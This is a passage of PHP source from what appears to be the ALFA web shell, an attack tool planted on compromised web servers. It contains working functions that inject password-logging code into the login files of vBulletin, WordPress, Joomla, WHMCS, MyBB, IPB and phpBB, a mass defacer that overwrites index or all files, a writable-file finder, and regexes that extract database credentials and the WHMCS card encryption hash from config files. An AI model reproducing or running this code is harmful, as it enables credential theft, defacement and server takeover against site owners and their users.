  5590. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
  5591. }else{
  5592. alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
  5593. echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
  5594. }}
  5595. echo '</div>';
  5596. alfafooter();
  5597. }
  5598. function alfacmshijacker(){
  5599. alfahead();
  5600. AlfaNum(5,6,7,8,9,10);
  5601. echo '<div class=header><br>
  5602. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
  5603. <div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
  5604. $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
  5605. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
  5606. echo("</select>");
  5607. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
  5608. SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
  5609. <input type="submit" name="btn" value=" "></form></center><br>';
  5610. $cms = $_POST['alfa1'];
  5611. $saveto = $_POST['alfa2'];
  5612. $cmspath = $_POST['alfa4'];
  5613. if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
  5614. echo __pre();
  5615. alfaHijackCms($cms,$cmspath,$saveto);
  5616. }
  5617. echo '</div>';
  5618. alfafooter();
  5619. }
  5620. function alfaHijackCms($cms,$cmspath,$saveto){
  5621. switch($cms){
  5622. case "vb":
  5623. hijackvBulletin($cmspath,$saveto);
  5624. break;
  5625. case "wp":
  5626. hijackwp($cmspath,$saveto);
  5627. break;
  5628. case "jom":
  5629. hijackJoomla($cmspath,$saveto);
  5630. break;
  5631. case "whmcs":
  5632. hijackWhmcs($cmspath,$saveto);
  5633. break;
  5634. case "mybb":
  5635. hijackMybb($cmspath,$saveto);
  5636. break;
  5637. case "ipb":
  5638. hijackIPB($cmspath,$saveto);
  5639. break;
  5640. case "phpbb":
  5641. hijackPHPBB($cmspath,$saveto);
  5642. break;
  5643. default:
  5644. echo "error!";
  5645. break;
  5646. }
  5647. }
  5648. function hijackvBulletin($path,$saveto){
  5649. $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5650. $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
  5651. $code=str_replace('{saveto_path}',$saveto,$code);
  5652. $login = $path."/login.php";
  5653. $class = $path."/includes/class_bootstrap.php";
  5654. $dologin = 'do_login_redirect();';
  5655. $evil_login= "\t".$code."\n\t".$dologin;
  5656. $evil_class = "true";
  5657. if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
  5658. $data_login = @file_get_contents($login);
  5659. $data_class = @file_get_contents($class);
  5660. if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
  5661. $login_replace = str_replace($dologin,$evil_login, $data_login);
  5662. $class_replace = str_replace($clearpw,$evil_class, $data_class);
  5663. @file_put_contents($login, $login_replace);
  5664. @file_put_contents($class, $class_replace);
  5665. hijackOutput(0,$saveto);
  5666. }else{
  5667. hijackOutput(1);
  5668. }
  5669. }else{
  5670. hijackOutput(1);
  5671. }
  5672. }
  5673. function hijackwp($path,$saveto){
  5674. $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5675. $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
  5676. $code=str_replace('{saveto_path}',$saveto,$code);
  5677. $login=$path."/wp-login.php";
  5678. $evil_login = "\t".$redirect_wp."\n\t".$code;
  5679. if(@is_file($login) AND @is_writable($login)){
  5680. $data_login = @file_get_contents($login);
  5681. if(strstr($data_login, $redirect_wp)){
  5682. $login_replace = str_replace($redirect_wp,$evil_login, $data_login);
  5683. @file_put_contents($login, $login_replace);
  5684. hijackOutput(0,$saveto);
  5685. }else{
  5686. hijackOutput(1);
  5687. }
  5688. }else{
  5689. hijackOutput(1);
  5690. }
  5691. }
  5692. function hijackJoomla($path,$saveto){
  5693. $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
  5694. $code=str_replace('{saveto_path}',$saveto,$code);
  5695. $comp=$path."/administrator/components/com_login/";
  5696. if(@is_file($comp."/login.php")){
  5697. $login = $comp."/login.php";
  5698. }elseif(@is_file($comp."/admin.login.php")){
  5699. $login = $comp."/admin.login.php";
  5700. }else{
  5701. $login = '';
  5702. }
  5703. if(@is_file($login) AND @is_writable($login) AND $login != ''){
  5704. $data_login = @file_get_contents($login);
  5705. $evil_login = $code."\n".$data_login;
  5706. @file_put_contents($login, $evil_login);
  5707. hijackOutput(0,$saveto);
  5708. }else{
  5709. hijackOutput(1);
  5710. }
  5711. }
  5712. function hijackWhmcs($path,$saveto){
  5713. $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
  5714. $code=str_replace('{saveto_path}',$saveto,$code);
  5715. $conf=$path."/configuration.php";
  5716. if(@is_file($conf) AND @is_writable($conf)){
  5717. $data_conf = @file_get_contents($conf);
  5718. if(!strstr($data_conf,'?>'))$code = '?>'.$code;
  5719. $evil_conf = $data_conf."\n".$code;
  5720. @file_put_contents($conf, $evil_conf);
  5721. hijackOutput(0,$saveto);
  5722. }else{
  5723. hijackOutput(1);
  5724. }
  5725. }
  5726. function hijackMybb($path,$saveto){
  5727. $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE`username` =\'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
  5728. $find = '$loginhandler->complete_login();';
  5729. $code=str_replace('{saveto_path}',$saveto,$code);
  5730. $login=$path."/member.php";
  5731. $evil_login = "\t".$code."\n\t".$find;
  5732. if(@is_file($login) AND @is_writable($login)){
  5733. $data_login = @file_get_contents($login);
  5734. if(strstr($data_login, $find)){
  5735. $login_replace = str_replace($find,$evil_login, $data_login);
  5736. @file_put_contents($login, $login_replace);
  5737. hijackOutput(0,$saveto);
  5738. }else{
  5739. hijackOutput(1);
  5740. }
  5741. }else{
  5742. hijackOutput(1);
  5743. }
  5744. }
  5745. function hijackIPB($path,$saveto){
  5746. $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5747. $find = 'unset( $member[\'plainPassword\'] );';
  5748. $code=str_replace('{saveto_path}',$saveto,$code);
  5749. $login=$path."/admin/sources/handlers/han_login.php";
  5750. $evil_login = "\t".$find."\n\t".$code;
  5751. if(@is_file($login) AND @is_writable($login)){
  5752. $data_login = @file_get_contents($login);
  5753. if(strstr($data_login, $find)){
  5754. $login_replace = str_replace($find,$evil_login, $data_login);
  5755. @file_put_contents($login, $login_replace);
  5756. hijackOutput(0,$saveto);
  5757. }else{
  5758. hijackOutput(1);
  5759. }
  5760. }else{
  5761. hijackOutput(1);
  5762. }
  5763. }
  5764. function hijackPHPBB($path,$saveto){
  5765. $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5766. $find = 'case \'login\':';
  5767. $code=str_replace('{saveto_path}',$saveto,$code);
  5768. $login=$path."/ucp.php";
  5769. $evil_login = "\t".$find."\n\t".$code;
  5770. if(@is_file($login) AND @is_writable($login)){
  5771. $data_login = @file_get_contents($login);
  5772. if(strstr($data_login, $find)){
  5773. $login_replace = str_replace($find,$evil_login, $data_login);
  5774. @file_put_contents($login, $login_replace);
  5775. hijackOutput(0,$saveto);
  5776. }else{
  5777. hijackOutput(1);
  5778. }
  5779. }else{
  5780. hijackOutput(1);
  5781. }
  5782. }
  5783. function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
  5784. function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
  5785. if(@is_dir($dir)){
  5786. $files=@scandir($dir);
  5787. foreach($files as $key => $value){
  5788. $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
  5789. if(!@is_dir($path)){
  5790. if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
  5791. if($e=='str'){
  5792. $content = @file_get_contents($path);
  5793. if(strpos($content, $string) !== false){
  5794. echo str_replace('\\','/',$path) . "<br>";
  5795. }
  5796. }else{
  5797. if(strstr($value,$string)){
  5798. echo str_replace('\\','/',$path) . "<br>";
  5799. }
  5800. }
  5801. $results[] = $path;
  5802. }elseif($value != "." && $value != "..") {
  5803. Alfa_StrSearcher($path,$string,$ext,$e,$results);
  5804. $results[] = $path;
  5805. }}}}
  5806. function alfasearcher(){
  5807. alfahead();
  5808. echo '<div class=header><center><p><divclass="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
  5809. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
  5810. echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
  5811. <div class="txtfont">
  5812. Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
  5813. Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
  5814. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5815. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5816. $dir = $_POST['alfa2'];
  5817. $ext = $_POST['alfa3'];
  5818. $method = $_POST['alfa4'];
  5819. if($_POST['alfa5']=='>>'){
  5820. echo __pre();
  5821. if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
  5822. Alfa_Searcher($dir,trim($ext),$method);
  5823. }
  5824. }
  5825. if($_POST['alfa1']=='str'){
  5826. echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
  5827. <div class="txtfont">
  5828. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
  5829. String: <input type="text" name="string" value="">
  5830. Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
  5831. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5832. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5833. $dir = $_POST['alfa2'];
  5834. $string = $_POST['alfa3'];
  5835. $ext = $_POST['alfa5'];
  5836. if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
  5837. echo __pre();
  5838. Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
  5839. }
  5840. }
  5841. echo '</div>';alfafooter();
  5842. }
  5843. function alfaMassDefacer(){
  5844. alfahead();
  5845. AlfaNum(5,6,7,8,9,10);
  5846. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
  5847. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
  5848. Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  5849. DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
  5850. </form>';
  5851. $dir = $_POST['alfa1'];
  5852. $defpage = $_POST['alfa2'];
  5853. $method = $_POST['alfa3'];
  5854. $fCurrent = $GLOBALS['__file_path'];
  5855. if($_POST['alfa4'] == '>>'){
  5856. if(!empty($dir)){
  5857. if(@is_dir($dir)){
  5858. if(@is_readable($dir)){
  5859. if(@is_file($defpage)){
  5860. if($dh = @opendir($dir)){
  5861. echo __pre();
  5862. while (($file = @readdir($dh)) !== false){
  5863. if($file == '..' || $file == '.')continue;
  5864. $newfile=$dir.$file;
  5865. if($fCurrent == $newfile)continue;
  5866. if(@is_dir($newfile)){
  5867. Alfa_ReadDir($newfile,$method,$defpage);
  5868. }else{
  5869. if(!@is_writable($newfile))continue;
  5870. if(!@is_readable($newfile))continue;
  5871. Alfa_Rewriter($newfile,$file,$defpage,$method);
  5872. }
  5873. }
  5874. closedir($dh);
  5875. }else{__alert('<font color="red">Error In OpenDir...</font>');}
  5876. }else{__alert('<font color="red">DefPage File NotFound...</font>');}
  5877. }else{__alert('<font color="red">Directory is not Readable...</font>');}
  5878. }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
  5879. }else{__alert('<font color="red">Dir is Empty...</font>');}
  5880. }
  5881. echo '</div>';
  5882. alfafooter();
  5883. }
  5884. function Alfa_ReadDir($dir,$method='',$defpage=''){
  5885. if(!@is_readable($dir)) return false;
  5886. if(@is_dir($dir)) {
  5887. if ($dh = @opendir($dir)) {
  5888. while(($file=readdir($dh))!==false) {
  5889. if($file == '..' || $file == '.')continue;
  5890. $newfile=$dir.'/'.$file;
  5891. if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
  5892. if(@is_file($newfile)){
  5893. if(!@is_readable($newfile))continue;
  5894. Alfa_Rewriter($newfile,$file,$defpage,$method);
  5895. }
  5896. }
  5897. closedir($dh);
  5898. }
  5899. }
  5900. }
  5901. function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
  5902. if(!@is_writable($dir)) return false;
  5903. if(!@is_readable($dir)) return false;
  5904. $defpage=@file_get_contents($defpage);
  5905. if($m == 'index'){
  5906. $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
  5907. if(in_array(strtolower($file),$indexs)){
  5908. @file_put_contents($dir,$defpage);
  5909. echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
  5910. }
  5911. }elseif($m=='all'){
  5912. @file_put_contents($dir,$defpage);
  5913. echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
  5914. }
  5915. }
  5916. function alfaGetDisFunc(){
  5917. alfahead();
  5918. echo '<div class="header">';
  5919. $disfun = @ini_get('disable_functions');
  5920. $s = explode(',',$disfun);
  5921. $f = array_unique($s);
  5922. echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
  5923. $i=1;
  5924. foreach($f as $s){
  5925. $s=trim($s);
  5926. if(function_exists($s)||!is_callable($s))continue;
  5927. echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
  5928. echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
  5929. $i++;
  5930. }
  5931. echo '</table></center>';
  5932. echo '</div>';
  5933. alfafooter();
  5934. }
  5935. function Alfa_Create_A_Tag($action,$vals){
  5936. $nulls = array();
  5937. foreach($vals as $key => $val){
  5938. echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
  5939. for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
  5940. $f = implode(',',$nulls);
  5941. echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
  5942. unset($nulls);
  5943. }
  5944. }
  5945. function Alfa_Searcher($dir, $ext, $method) {
  5946. if(@is_readable($dir)){
  5947. if($method == 'all')$ext = '*';
  5948. if($method == 'dirs')$ext = '*';
  5949. $globFiles = @glob("$dir/*.$ext");
  5950. $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
  5951. $blacklist = array();
  5952. foreach ($globDirs as $dir) {
  5953. if(!@is_readable($dir)) continue;
  5954. @Alfa_Searcher($dir, $ext, $method);
  5955. }
  5956. switch($method){
  5957. case "files":
  5958. foreach ($globFiles as $file){
  5959. if(@is_writable($file)){
  5960. echo "$file<br>";
  5961. }
  5962. }
  5963. break;
  5964. case "dirs":
  5965. foreach ($globFiles as $file){
  5966. if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
  5967. echo dirname($file).'<br>';
  5968. $blacklist[] = dirname($file);
  5969. }
  5970. }
  5971. break;
  5972. case "all":
  5973. foreach ($globFiles as $file){
  5974. echo $file.'<br>';
  5975. }
  5976. break;
  5977. }
  5978. unset($blacklist);
  5979. }
  5980. }
  5981. function AlfaiFrameCreator($f,$width='100%',$height='600px'){
  5982. return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
  5983. }
  5984. class AlfaCURL {
  5985. public $headers;
  5986. public $user_agent;
  5987. public $compression;
  5988. public $cookie_file;
  5989. public $proxy;
  5990. public $path;
  5991. public $ssl = false;
  5992. public $curl_status = true;
  5993. function __construct($cookies=false,$compression='gzip',$proxy=''){
  5994. if(!extension_loaded('curl')){$curl_status = false;return false;}
  5995. $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
  5996. $this->headers[] = 'Connection: Keep-Alive';
  5997. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
  5998. $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
  5999. $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
  6000. $this->compression=$compression;
  6001. $this->proxy=$proxy;
  6002. $this->cookies=$cookies;
  6003. if($this->cookies)$this->cookie($this->path);
  6004. }
  6005. function cookie($cookie_file) {
  6006. if (_alfa_file_exists($cookie_file,false)) {
  6007. $this->cookie_file=$cookie_file;
  6008. }else{
  6009. @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
  6010. $this->cookie_file=$cookie_file;
  6011. @fclose($this->cookie_file);
  6012. }
  6013. }
  6014. function Send($url,$method="get",$data=""){
  6015. if(!$this->curl_status){return false;}
  6016. $process = curl_init($url);
  6017. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
  6018. curl_setopt($process, CURLOPT_HEADER, 0);
  6019. curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
  6020. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  6021. curl_setopt($process, CURLOPT_ENCODING , $this->compression);
  6022. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  6023. if($this->ssl){
  6024. curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
  6025. curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
  6026. }
  6027. if($this->cookies){
  6028. curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
  6029. curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
  6030. }
  6031. if($this->proxy){
  6032. curl_setopt($process, CURLOPT_PROXY, $this->proxy);
  6033. }
  6034. if($method=='post'){
  6035. curl_setopt($process, CURLOPT_POSTFIELDS, $data);
  6036. curl_setopt($process, CURLOPT_POST, 1);
  6037. curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
  6038. }
  6039. $return = curl_exec($process);
  6040. curl_close($process);
  6041. return $return;
  6042. }
  6043. function error($error) {
  6044. echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
  6045. die;
  6046. }
  6047. }
  6048. function getConfigHtml($cms){
  6049. $content = '';
  6050. $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
  6051. $content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
  6052. foreach($cms_array as $key => $val){
  6053. $content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
  6054. }
  6055. $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/'size='30' /> <button class='button'>GetConfig</button>";
  6056. $content .= "</form>";
  6057. return $content;
  6058. }
  6059. function alfaGetConfig(){
  6060. $cms = $_POST['alfa1'];
  6061. $path = trim($_POST['alfa2']);
  6062. $config = array(
  6063. 'wp'=>array('file'=>'/wp-config.php',
  6064. 'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6065. 'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6066. 'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6067. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6068. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6069. ),
  6070. 'drupal'=>array('file'=>'/config.php',
  6071. 'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6072. 'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6073. 'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6074. 'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
  6075. 'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
  6076. ),
  6077. 'vb'=>array('file'=>'/includes/config.php',
  6078. 'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6079. 'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6080. 'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6081. 'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6082. 'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6083. ),
  6084. 'phpnuke'=>array('file'=>'/config.php',
  6085. 'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6086. 'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6087. 'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6088. 'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
  6089. 'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
  6090. ),
  6091. 'smf'=>array('file'=>'/Settings.php',
  6092. 'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6093. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6094. 'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6095. 'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6096. 'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6097. ),
  6098. 'whmcs'=>array('file'=>'/configuration.php',
  6099. 'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6100. 'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6101. 'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6102. 'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6103. 'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6104. ),
  6105. 'joomla'=>array('file'=>'/configuration.php',
  6106. 'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6107. 'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6108. 'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6109. 'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6110. 'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6111. ),
  6112. 'phpbb'=>array('file'=>'/config.php',
